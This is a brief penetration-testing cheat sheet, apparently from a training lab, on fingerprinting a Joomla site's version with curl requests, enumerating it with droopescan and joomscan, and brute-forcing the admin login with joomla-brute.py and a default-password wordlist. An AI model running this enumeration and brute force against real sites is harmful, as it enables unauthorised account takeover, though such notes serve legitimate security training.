finding
Identify CMS version
curl -s http://dev."$domain" | grep JoomlaIdentify Joomla version
curl -s http://dev.inlanefreight.local/README.txt | head -n 5
curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml | xmllint --format -
curl -s http://dev.inlanefreight.local/plugins/system/cache/cache.xmlEnumeration
droopescan
|_____ sudo pip3 install droopescan
JoomlaScan
joomscanBrute force attack
sudo python3 joomla-brute.py -u http://dev."$domain" -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr adminLast updated